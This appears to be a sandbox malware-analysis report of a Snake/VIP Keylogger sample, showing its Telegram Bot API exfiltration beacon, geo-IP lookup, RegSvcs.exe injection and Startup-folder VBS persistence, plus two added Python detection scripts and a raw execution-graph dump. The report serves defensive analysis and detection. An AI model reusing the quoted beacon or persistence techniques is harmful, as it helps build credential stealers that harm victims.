                                                                    2024-09-25 13:34:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    19 | 192.168.2.5 | 49745 | 149.154.167.220 | 443 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-09-25 13:34:42 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                    Host: api.telegram.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:42 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.18.0
                                                                    Date: Wed, 25 Sep 2024 13:34:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 55
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2024-09-25 13:34:42 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}
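
Sessions 18 and 19 are the two network artefacts worth turning into a check: the RegSvcs.exe process first asks reallyfreegeoip.org for the country of its own public IP, then posts a status message to the Telegram Bot API. In session 19 the token segment of the path is empty (`/bot/sendMessage` rather than `/bot<token>/sendMessage`) and `chat_id` is blank, which is consistent with Telegram's 404 reply. The script below is an added example for this report, not Joe Sandbox's or the malware's code: it takes (Host, request line) pairs constructed from the two sessions above, recognises the geo-IP lookup and the bot beacon, percent-decodes the `text` parameter into the keylogger's "PC Name / Date and Time / Country Name" fields, and reports whether the token segment has the shape of a real bot token. The host list, the assumed token shape and the field-splitting rule are mine.

```python
"""Network-side triage of sessions 18 and 19 above.

Added example for this report, not Joe Sandbox's or the malware's code.  The
two request records are constructed from the session dumps above; only the
Host header and the request line are needed, which is what a TLS-inspecting
proxy or the sandbox's own capture gives you.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from sessions 18 and 19 above: (Host header, request line).
SAMPLE_REQUESTS = [
    ("reallyfreegeoip.org", "GET /xml/8.46.123.33 HTTP/1.1"),
    ("api.telegram.org",
     "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0A"
     "Date%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20"
     "United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you"
     "%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D"
     " HTTP/1.1"),
]

GEOIP_HOSTS = {"reallyfreegeoip.org"}          # seen in session 18; extend as needed
GEOIP_PATH = re.compile(r"^/(?:xml|json|csv)/(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")
# Telegram Bot API paths are /bot<token>/<method>; an empty token still matches.
BOT_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")
# Assumed shape of a genuine bot token: "<numeric bot id>:<long secret>".
TOKEN_SHAPE = re.compile(r"^\d+:[A-Za-z0-9_-]{30,}$")


def split_request_line(line):
    """'GET /path?query HTTP/1.1' -> (method, urlsplit result)."""
    method, target, _version = line.split(" ", 2)
    return method, urlsplit(target)


def parse_geoip_lookup(host, request_line):
    """Return {'host', 'lookup_ip'} for a public-IP geolocation request, else None."""
    if host not in GEOIP_HOSTS:
        return None
    _, url = split_request_line(request_line)
    m = GEOIP_PATH.match(url.path)
    return {"host": host, "lookup_ip": m.group("ip")} if m else None


def parse_telegram_beacon(host, request_line):
    """Decode a Bot API call: method, token, chat_id and the 'Key: value' lines in text."""
    if host != "api.telegram.org":
        return None
    _, url = split_request_line(request_line)
    m = BOT_PATH.match(url.path)
    if not m:
        return None
    params = parse_qs(url.query, keep_blank_values=True)   # percent-decodes values
    text = params.get("text", [""])[0]
    fields = {}
    for line in text.replace("\r\n", "\n").split("\n"):
        # The beacon body is "Key:value" lines plus a bracketed free-text note.
        if ":" in line and not line.startswith("["):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    token = m.group("token")
    return {
        "api_method": m.group("method"),
        "token": token,
        "token_plausible": bool(TOKEN_SHAPE.match(token)),
        "chat_id": params.get("chat_id", [""])[0],
        "fields": fields,
    }


def triage(records):
    """Run both parsers over (host, request line) pairs; returns [(kind, info), ...]."""
    findings = []
    for host, line in records:
        for kind, parser in (("geoip_lookup", parse_geoip_lookup),
                             ("telegram_beacon", parse_telegram_beacon)):
            info = parser(host, line)
            if info:
                findings.append((kind, info))
    return findings


if __name__ == "__main__":
    for kind, info in triage(SAMPLE_REQUESTS):
        print(kind, info)
```

The sandbox sees the request lines because it intercepts TLS; on a production network without inspection you only get DNS or SNI for api.telegram.org and reallyfreegeoip.org, so the portable signal is the combination of those two destinations with the originating process (here a .NET framework utility, RegSvcs.exe, as the PID column above shows) rather than the URL contents.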



                                                                    Target ID:0
                                                                    Start time:09:34:03
                                                                    Start date:25/09/2024
                                                                    Path:C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'275'767 bytes
                                                                    MD5 hash:34280E3A145D8D865EFEDF422B568E46
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:09:34:08
                                                                    Start date:25/09/2024
                                                                    Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'275'767 bytes
                                                                    MD5 hash:34280E3A145D8D865EFEDF422B568E46
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:09:34:10
                                                                    Start date:25/09/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                                                                    Imagebase:0x290000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4560135222.000000000039D000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4562656465.00000000026CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:09:34:22
                                                                    Start date:25/09/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                                    Imagebase:0x7ff6ffbf0000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:09:34:25
                                                                    Start date:25/09/2024
                                                                    Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'275'767 bytes
                                                                    MD5 hash:34280E3A145D8D865EFEDF422B568E46
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:09:34:29
                                                                    Start date:25/09/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                    Imagebase:0x990000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.4560074410.0000000000423000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false
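
The process table above carries the host-side counterpart of the network sessions. Targets 2, 3 and 7 run with the command line of a different executable (name.exe and RegSvcs.exe both start with the dropper's, or the copy's, quoted path as argv[0]), which is what the injection into RegSvcs.exe looks like in a process-creation log; target 5 is wscript.exe running a .vbs from the user's Startup folder, and targets 2 and 6 run from %LOCALAPPDATA%. The script below is an added example for this report, not Joe Sandbox's code: it encodes those entries as constructed, Sysmon-like process-creation events and applies the three checks a detection engineer would write from them. The event field names, the list of abusable .NET host binaries beyond RegSvcs.exe and the user-writable path markers are assumptions of mine.

```python
"""Host-side triage of the process table above.

Added example for this report, not Joe Sandbox's code.  EVENTS is constructed
from the Target ID 0-7 entries above in a minimal Sysmon-like shape; the field
names are an assumption and need mapping to your own EDR schema.
"""
import ntpath
import re

# Constructed from the process table above. "id" is the report's Target ID
# (Joe Sandbox's own index), not a Windows PID.
DROPPER = r"C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
COPY = r"C:\Users\user\AppData\Local\directory\name.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
STARTUP_VBS = (r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\name.vbs")
EVENTS = [
    {"id": 0, "image": DROPPER, "cmdline": '"%s"' % DROPPER},
    {"id": 2, "image": COPY,    "cmdline": '"%s"' % DROPPER},
    {"id": 3, "image": REGSVCS, "cmdline": '"%s"' % DROPPER},
    {"id": 5, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": '"C:\\Windows\\System32\\WScript.exe" "%s"' % STARTUP_VBS},
    {"id": 6, "image": COPY,    "cmdline": '"%s"' % COPY},
    {"id": 7, "image": REGSVCS, "cmdline": '"%s"' % COPY},
]

# RegSvcs.exe is the host seen above; the others are well-known .NET
# utilities abused the same way (assumed list, extend to taste).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\")


def argv(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def same_path(a, b):
    """Case-insensitive path comparison with Windows semantics on any OS."""
    return ntpath.normcase(a) == ntpath.normcase(b)


def triage_process(ev):
    """Return [(tag, detail), ...] for one process-creation event."""
    image = ev["image"]
    base = ntpath.basename(image).lower()
    args = argv(ev["cmdline"])
    found = []
    # 1. The image on disk is not the executable named in argv[0]: the process
    #    was created by an injector that reused its own command line.
    if args and not same_path(args[0], image):
        found.append(("cmdline_mismatch", "%s started as %s" % (base, args[0])))
        if base in DOTNET_HOSTS:
            found.append(("dotnet_host_hollowed", image))
    # 2. A script host launched on a script that lives in the Startup folder.
    if base in SCRIPT_HOSTS:
        for arg in args[1:]:
            low = arg.lower()
            if STARTUP_DIR in low and low.endswith(SCRIPT_EXTS):
                found.append(("startup_script", arg))
    # 3. An executable running from a user-writable location.
    if any(marker in image.lower() for marker in USER_WRITABLE):
        found.append(("userland_image", image))
    return found


def triage(events):
    """Map Target ID -> findings, omitting processes with nothing to report."""
    result = {}
    for ev in events:
        found = triage_process(ev)
        if found:
            result[ev["id"]] = found
    return result


if __name__ == "__main__":
    for target_id, found in sorted(triage(EVENTS).items()):
        for tag, detail in found:
            print("target %d: %s (%s)" % (target_id, tag, detail))
```

Of the three checks, the argv[0]/image mismatch is the one that survives outside the sandbox: the hollowed RegSvcs.exe is a signed Microsoft binary in a trusted path, so reputation and path-based rules pass it, while a process whose command line names a different executable is rare in legitimate software.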


                                                                      Execution Graph

                                                                      Execution Coverage:3.1%
                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                      Signature Coverage:8.8%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:35
                                                                      [Execution graph: the interactive call graph (2000 nodes, 35 limit nodes) does not render as text and its node/edge data is omitted here. The captured nodes lie in the 0x400000-based 32-bit image and cover CRT start-up and a tray-icon window procedure; Windows APIs named on the graph are DefWindowProcW, Shell_NotifyIconW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, LoadStringW, DestroyIcon, GetModuleFileNameW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetModuleHandleW, GetProcAddress, ExitProcess, RaiseException, RtlAllocateHeap, HeapCreate, HeapAlloc, GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, GetStdHandle, GetFileType, SetHandleCount, SystemParametersInfoW, GetCurrentDirectoryW, FreeLibrary, VariantClear and Sleep.]
86537->86538 86538->86534 86538->86536 86539->86472 86541 41377c __dosmaperr 86540->86541 86542 413753 RtlFreeHeap 86540->86542 86541->86470 86542->86541 86543 413768 86542->86543 86549 417f77 46 API calls __getptd_noexit 86543->86549 86545 41376e GetLastError 86545->86541 86550 417daa 86546->86550 86549->86545 86551 417dc9 __crtGetStringTypeA_stat __call_reportfault 86550->86551 86552 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86551->86552 86555 417eb5 __call_reportfault 86552->86555 86554 417ed1 GetCurrentProcess TerminateProcess 86554->86478 86556 41a208 86555->86556 86557 41a210 86556->86557 86558 41a212 IsDebuggerPresent 86556->86558 86557->86554 86564 41fe19 86558->86564 86561 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86562 421ff0 __call_reportfault 86561->86562 86563 421ff8 GetCurrentProcess TerminateProcess 86561->86563 86562->86563 86563->86554 86564->86561 86565->86482 86568 408f48 ctype 86566->86568 86567 4265c7 VariantClear 86569 408f55 ctype 86567->86569 86568->86567 86568->86569 86569->86487 86626 40ebd0 86570->86626 86630 4182cb 86573->86630 86575 41195e 86637 4181f2 LeaveCriticalSection 86575->86637 86577 40d748 86578 4119b0 86577->86578 86579 4119d6 86578->86579 86580 4119bc 86578->86580 86579->86495 86580->86579 86672 417f77 46 API calls __getptd_noexit 86580->86672 86582 4119c6 86673 417f25 10 API calls _xtow_s@20 86582->86673 86584 4119d1 86584->86495 86585->86497 86674 401f20 86586->86674 86588 40d5b6 IsDebuggerPresent 86589 40d5c4 86588->86589 86590 42e1bb MessageBoxA 86588->86590 86591 42e1d4 86589->86591 86592 40d5e3 86589->86592 86590->86591 86846 403a50 52 API calls 3 library calls 86591->86846 86744 40f520 86592->86744 86596 40d5fd GetFullPathNameW 86756 401460 86596->86756 86598 40d63b 86599 40d643 86598->86599 86601 42e231 SetCurrentDirectoryW 86598->86601 86600 40d64c 86599->86600 86847 432fee 6 API calls 86599->86847 86771 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW 
LoadIconW 86600->86771 86601->86599 86605 42e252 86605->86600 86606 42e25a GetModuleFileNameW 86605->86606 86608 42e274 86606->86608 86609 42e2cb GetForegroundWindow ShellExecuteW 86606->86609 86848 401b10 86608->86848 86613 40d688 86609->86613 86610 40d656 86612 40d669 86610->86612 86615 40e0c0 74 API calls 86610->86615 86779 4091e0 86612->86779 86619 40d692 SetCurrentDirectoryW 86613->86619 86615->86612 86619->86499 86620 42e28d 86855 40d200 52 API calls 2 library calls 86620->86855 86623 42e299 GetForegroundWindow ShellExecuteW 86624 42e2c6 86623->86624 86624->86613 86625 40ec00 LoadLibraryA GetProcAddress 86625->86493 86627 40d72e 86626->86627 86628 40ebd6 LoadLibraryA 86626->86628 86627->86493 86627->86625 86628->86627 86629 40ebe7 GetProcAddress 86628->86629 86629->86627 86631 4182e0 86630->86631 86632 4182f3 EnterCriticalSection 86630->86632 86638 418209 86631->86638 86632->86575 86634 4182e6 86634->86632 86665 411924 46 API calls 3 library calls 86634->86665 86637->86577 86639 418215 __tsopen_nolock 86638->86639 86640 418225 86639->86640 86641 41823d 86639->86641 86666 418901 46 API calls 2 library calls 86640->86666 86643 416b04 __malloc_crt 45 API calls 86641->86643 86650 41824b __tsopen_nolock 86641->86650 86645 418256 86643->86645 86644 41822a 86667 418752 46 API calls 8 library calls 86644->86667 86648 41825d 86645->86648 86649 41826c 86645->86649 86647 418231 86668 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86647->86668 86669 417f77 46 API calls __getptd_noexit 86648->86669 86653 4182cb __lock 45 API calls 86649->86653 86650->86634 86655 418273 86653->86655 86656 4182a6 86655->86656 86657 41827b InitializeCriticalSectionAndSpinCount 86655->86657 86658 413748 _free 45 API calls 86656->86658 86659 418297 86657->86659 86660 41828b 86657->86660 86658->86659 86671 4182c2 LeaveCriticalSection _doexit 86659->86671 86661 413748 _free 45 API calls 86660->86661 86662 418291 86661->86662 86670 417f77 46 API calls __getptd_noexit 
86662->86670 86666->86644 86667->86647 86669->86650 86670->86659 86671->86650 86672->86582 86673->86584 86856 40e6e0 86674->86856 86678 401f41 GetModuleFileNameW 86874 410100 86678->86874 86680 401f5c 86886 410960 86680->86886 86683 401b10 52 API calls 86684 401f81 86683->86684 86889 401980 86684->86889 86686 401f8e 86687 408f40 VariantClear 86686->86687 86688 401f9d 86687->86688 86689 401b10 52 API calls 86688->86689 86690 401fb4 86689->86690 86691 401980 53 API calls 86690->86691 86692 401fc3 86691->86692 86693 401b10 52 API calls 86692->86693 86694 401fd2 86693->86694 86897 40c2c0 86694->86897 86696 401fe1 86697 40bc70 52 API calls 86696->86697 86698 401ff3 86697->86698 86915 401a10 86698->86915 86700 401ffe 86922 4114ab 86700->86922 86703 428b05 86705 401a10 52 API calls 86703->86705 86704 402017 86706 4114ab __wcsicoll 58 API calls 86704->86706 86707 428b18 86705->86707 86708 402022 86706->86708 86710 401a10 52 API calls 86707->86710 86708->86707 86709 40202d 86708->86709 86711 4114ab __wcsicoll 58 API calls 86709->86711 86712 428b33 86710->86712 86713 402038 86711->86713 86715 428b3b GetModuleFileNameW 86712->86715 86714 402043 86713->86714 86713->86715 86716 4114ab __wcsicoll 58 API calls 86714->86716 86717 401a10 52 API calls 86715->86717 86718 40204e 86716->86718 86719 428b6c 86717->86719 86720 402092 86718->86720 86726 401a10 52 API calls 86718->86726 86729 428b90 _wcscpy 86718->86729 86721 40e0a0 52 API calls 86719->86721 86722 4020a3 86720->86722 86720->86729 86723 428b7a 86721->86723 86725 428bc6 86722->86725 86930 40e830 53 API calls 86722->86930 86724 401a10 52 API calls 86723->86724 86728 428b88 86724->86728 86727 402073 _wcscpy 86726->86727 86734 401a10 52 API calls 86727->86734 86728->86729 86731 401a10 52 API calls 86729->86731 86739 4020d0 86731->86739 86732 4020bb 86931 40cf00 53 API calls 86732->86931 86734->86720 86735 4020c6 86736 408f40 VariantClear 86735->86736 86736->86739 86738 402110 86741 408f40 VariantClear 86738->86741 86739->86738 
86742 401a10 52 API calls 86739->86742 86932 40cf00 53 API calls 86739->86932 86933 40e6a0 53 API calls 86739->86933 86743 402120 ctype 86741->86743 86742->86739 86743->86588 86745 4295c9 __crtGetStringTypeA_stat 86744->86745 86746 40f53c 86744->86746 86748 4295d9 GetOpenFileNameW 86745->86748 87612 410120 86746->87612 86748->86746 86750 40d5f5 86748->86750 86749 40f545 87616 4102b0 SHGetMalloc 86749->87616 86750->86596 86750->86598 86752 40f54c 87621 410190 GetFullPathNameW 86752->87621 86754 40f559 87632 40f570 86754->87632 87694 402400 86756->87694 86758 40146f 86761 428c29 _wcscat 86758->86761 87703 401500 86758->87703 86760 40147c 86760->86761 87711 40d440 86760->87711 86763 401489 86763->86761 86764 401491 GetFullPathNameW 86763->86764 86765 402160 52 API calls 86764->86765 86766 4014bb 86765->86766 86767 402160 52 API calls 86766->86767 86768 4014c8 86767->86768 86768->86761 86769 402160 52 API calls 86768->86769 86770 4014ee 86769->86770 86770->86598 86772 428361 86771->86772 86773 4103fc LoadImageW RegisterClassExW 86771->86773 87731 44395e EnumResourceNamesW LoadImageW 86772->87731 87730 410490 7 API calls 86773->87730 86776 40d651 86778 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86776->86778 86777 428368 86778->86610 86780 409202 86779->86780 86781 42d7ad 86779->86781 86839 409216 ctype 86780->86839 88003 410940 331 API calls 86780->88003 88006 45e737 90 API calls 3 library calls 86781->88006 86784 409386 86785 40939c 86784->86785 88004 40f190 10 API calls 86784->88004 86785->86613 86845 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86785->86845 86787 4095b2 86787->86785 86788 4095bf 86787->86788 88005 401a50 331 API calls 86788->88005 86789 409253 PeekMessageW 86789->86839 86791 40d410 VariantClear 86791->86839 86792 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86792->86785 86794 4095f9 86792->86794 86793 42d8cd Sleep 86793->86839 86798 42e158 TranslateMessage DispatchMessageW GetMessageW 86794->86798 86796 42e13b 88024 40d410 
VariantClear 86796->88024 86798->86798 86801 42e188 86798->86801 86800 409567 PeekMessageW 86800->86839 86801->86785 86804 44c29d 52 API calls 86844 4094e0 86804->86844 86805 46f3c1 107 API calls 86805->86839 86806 40e0a0 52 API calls 86806->86839 86807 46fdbf 108 API calls 86807->86844 86808 409551 TranslateMessage DispatchMessageW 86808->86800 86810 42dcd2 WaitForSingleObject 86811 42dcf0 GetExitCodeProcess CloseHandle 86810->86811 86810->86839 88013 40d410 VariantClear 86811->88013 86813 42dd3d Sleep 86813->86844 86814 47d33e 309 API calls 86814->86839 86817 4094cf Sleep 86817->86844 86818 408f40 VariantClear 86818->86844 86820 42d94d timeGetTime 88009 465124 53 API calls 86820->88009 86822 40c620 timeGetTime 86822->86844 86825 465124 53 API calls 86825->86844 86826 42dd89 CloseHandle 86826->86844 86828 42de19 GetExitCodeProcess CloseHandle 86828->86844 86830 401b10 52 API calls 86830->86844 86833 42de88 Sleep 86833->86839 86835 45e737 90 API calls 86835->86839 86838 42e0cc VariantClear 86838->86839 86839->86784 86839->86789 86839->86791 86839->86793 86839->86796 86839->86800 86839->86805 86839->86806 86839->86808 86839->86810 86839->86813 86839->86814 86839->86817 86839->86820 86839->86835 86839->86838 86840 408f40 VariantClear 86839->86840 86839->86844 87732 4091b0 86839->87732 87790 40afa0 86839->87790 87816 408fc0 86839->87816 87851 408cc0 86839->87851 87865 40d150 86839->87865 87870 40d170 86839->87870 87876 4096a0 86839->87876 88007 465124 53 API calls 86839->88007 88008 40c620 timeGetTime 86839->88008 88023 40e270 VariantClear ctype 86839->88023 86840->86839 86842 401980 53 API calls 86842->86844 86844->86804 86844->86807 86844->86818 86844->86822 86844->86825 86844->86826 86844->86828 86844->86830 86844->86833 86844->86839 86844->86842 88010 45178a 54 API calls 86844->88010 88011 47d33e 331 API calls 86844->88011 88012 453bc6 54 API calls 86844->88012 88014 40d410 VariantClear 86844->88014 88015 443d19 67 API calls _wcslen 86844->88015 88016 4574b4 
